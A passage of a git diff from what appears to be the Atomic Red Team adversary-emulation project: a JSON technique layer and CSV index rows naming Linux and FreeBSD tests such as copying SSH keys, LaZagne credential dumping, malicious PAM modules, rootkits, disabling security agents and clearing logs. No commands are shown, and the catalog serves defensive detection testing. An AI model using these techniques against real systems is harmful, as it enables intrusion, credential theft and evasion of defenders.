Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Base64 decoding with shell utilities (freebsd)\n- FreeBSD b64encode Shebang in CLI\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - FreeBSD\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":2,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n- List Google Chromium Bookmark JSON Files on FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- chflags - Remove immutable file attribute\n- Chmod through c script\n- Chmod through c script (freebsd)\n- Chown through c script\n- Chown through c script (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - 
Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n- Detect Virtualization Environment (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":2,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n- Security Software Discovery - pgrep (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":9,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - FreeBSD\n- 
Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - FreeBSD\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"comment":"\n- Create Systemd Service\n- Create SysV Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Add command to .shrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"comment":"\n- Trap EXIT\n- Trap EXIT (freebsd)\n- Trap SIGINT\n- Trap SIGINT (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Make and modify binary from C source (freebsd)\n- Set a SetUID flag on file\n- Set a SetUID flag on file (freebsd)\n- Set a SetGID flag on file\n- Set a SetGID flag on file (freebsd)\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"comment":"\n- Sudo usage\n- Sudo usage (freebsd)\n- Unlimited sudo cache timeout\n- Unlimited sudo cache timeout (freebsd)\n- Disable tty_tickets for sudo caching\n- Disable tty_tickets for sudo caching (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"comment":"\n- Search Through Bash History\n- Search Through sh History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with CP (freebsd)\n- Copy Private SSH Keys with rsync\n- Copy Private SSH Keys with rsync (freebsd)\n- Copy the users GnuPG directory with rsync\n- Copy the users GnuPG directory with rsync (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on FreeBSD\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM rule (freebsd)\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":11,"enabled":true,"comment":"\n- Disable syslog\n- Disable syslog (freebsd)\n- Disable Cb 
Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"comment":"\n- Disable history collection\n- Disable history collection (freebsd)\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment variable\n- Setting the HISTSIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTFILE environment variable (freebsd)\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":13,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start Packet Filter\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Add and delete Packet Filter rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":4,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Auditing Configuration Changes on FreeBSD Host\n- Logging Configuration Changes on Linux Host\n- Logging Configuration Changes on FreeBSD Host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 43e233ac90..9b6f436e15 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh
@@ -10,33 +11,54 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",10,chflags - Remove immutable file attribute,60eee3ea-2ebd-453b-a666-c52ce08d2709,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
+defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh
 defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
+defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
 defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
+defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
+defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
+defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
+defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",5,Truncate system log files via truncate utility (freebsd),14033063-ee04-4eaf-8f5d-ba07ca7a097c,sh
+defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",7,Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd),369878c6-fb04-48d6-8fc2-da9d97b3e054,sh
+defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",10,Overwrite FreeBSD system log via echo utility,11cb8ee1-97fb-4960-8587-69b8388ee9d9,sh
+defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",13,Delete system log files via unlink utility (freebsd),45ad4abd-19bd-4c5f-a687-41f3eee8d8c2,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",18,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Base64 decoding with shell utilities (freebsd),b6097712-c42e-4174-b8f2-4b1e1a5bbb3d,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encode Shebang in CLI,18ee2002-66e8-4518-87c5-c0ec9c8299ac,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
@@ -49,9 +71,11 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's mo
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start Packet Filter,0ca82ed1-0a94-4774-9a9a-a2c83a8022b7,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Add and delete Packet Filter rules,8b23cae1-66c1-41c5-b79d-e095b6098b5b,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
@@ -64,23 +88,32 @@ defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad
 defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
